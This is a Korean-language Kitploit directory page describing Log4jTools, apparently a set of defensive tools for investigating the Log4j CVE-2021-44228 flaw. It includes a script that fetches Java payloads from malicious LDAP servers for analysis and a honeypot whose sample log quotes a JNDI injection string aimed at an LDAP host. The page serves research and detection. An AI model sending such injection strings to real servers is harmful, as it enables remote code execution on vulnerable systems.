Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Log4jTools — Log4j CVE-2021-44228 조사를 위한 도구 | Kitploit
도구/GitHubGitHub/malwaretech/log4jtools
Payload GenerationVulnerability AnalysisExploitationInformation GatheringIntrusion Detection
GitHubmalwaretech/log4jtools

Log4jTools

Log4j CVE-2021-44228 조사를 위한 도구

저장소 보기
94124년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Log4jTools

Log4j CVE-2021-44228 조사를 위한 도구

버그 설명 및 데모

https://www.youtube.com/watch?v=0-abhd-CLwQ

FetchPayload.py (JNDI 조회에서 제공된 ldap 경로에서 java 페이로드 가져오기).

요구 사항: curl (시스템), requests (파이썬)

예제 명령:

root@kitploit:~
python FetchPayload.py ldap://maliciouserver:1337/path

[+] getting object from ldap://maliciouserver:1337/path
[+] exploit payload: http://maliciouserver:80/Exploit.class
[+] seeing if attacker left behind un-compile payload http://maliciouserver:80/Exploit.java
[x] failed to find payload Exploit.java
[+] trying to fetch compiled payload http://maliciouserver:80/Exploit.class
[+] found payload and saved to file Exploit.class_

SimpleHoneypot.py ('${' 존재를 기반으로 익스플로잇 시도를 포착하는 허니팟).

요구 사항: python3, asyncore

예제 명령:

root@kitploit:~
python3 SimpleHoneypot.py

[2021-12-09 13:00:00,000] Possible CVE-2021-44228 Attempt: 127.0.0.1:1111 -> port 8080 - GET /?id=${jdni:ldap://127.0.0.1:1389/hax} HTTP/1.1
도구 다운로드